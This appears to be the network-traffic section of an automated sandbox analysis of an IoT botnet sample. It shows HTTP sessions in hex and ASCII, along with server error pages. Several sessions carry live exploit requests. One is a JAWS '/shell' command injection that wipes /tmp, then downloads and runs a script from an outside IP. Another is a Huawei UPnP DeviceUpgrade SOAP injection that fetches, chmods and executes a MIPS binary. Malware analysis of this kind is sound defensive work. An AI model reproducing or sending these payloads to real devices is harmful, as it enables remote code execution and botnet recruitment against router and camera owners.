                                                            Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
                                                            Jan 26, 2024 15:32:56.926831007 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d
                                                            Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
                                                            Jan 26, 2024 15:32:56.926850080 CET1286INData Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72
                                                            Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
                                                            Jan 26, 2024 15:32:56.926867962 CET1286INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
                                                            Jan 26, 2024 15:32:56.926887035 CET1286INData Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66
                                                            Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
                                                            Jan 26, 2024 15:32:56.926906109 CET1286INData Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33
                                                            Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
                                                            Jan 26, 2024 15:32:56.926923990 CET1096INData Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38
                                                            Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
                                                            Jan 26, 2024 15:32:56.927248001 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                            Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to server.hotelcoral.com's <a href="mailto:jjoeltorre
                                                            Jan 26, 2024 15:32:56.927265882 CET367INData Raw: 6d 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74
                                                            Data Ascii: m_medium=cplogo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Cop


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            616192.168.2.234267850.118.154.12280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:56.776145935 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:56.930799961 CET406INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:56 GMT
                                                            Server: Apache/2
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            617192.168.2.235436035.197.22.6780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:56.785125971 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:56.948050976 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:56 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            618192.168.2.235190235.213.160.22480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:57.098575115 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:57.423238993 CET306INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:57 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 82
                                                            Connection: close
                                                            ETag: "655b1984-52"
                                                            Remote-Addr: 81.181.57.74
                                                            X-Default-Vhost: 1
                                                            Data Raw: 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 20 7c 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 0a
                                                            Data Ascii: 400 - Bad Request | Your browser sent a request this server could not understand.


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            619192.168.2.2342036156.241.71.5837215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:57.468846083 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:59.451056004 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:33:01.914726973 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            620192.168.2.234345613.249.109.20080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:58.550473928 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:58.668082952 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:32:58 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            621192.168.2.233876438.53.62.16280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:58.590976000 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:58.748066902 CET330INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:58 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 146
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=60
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
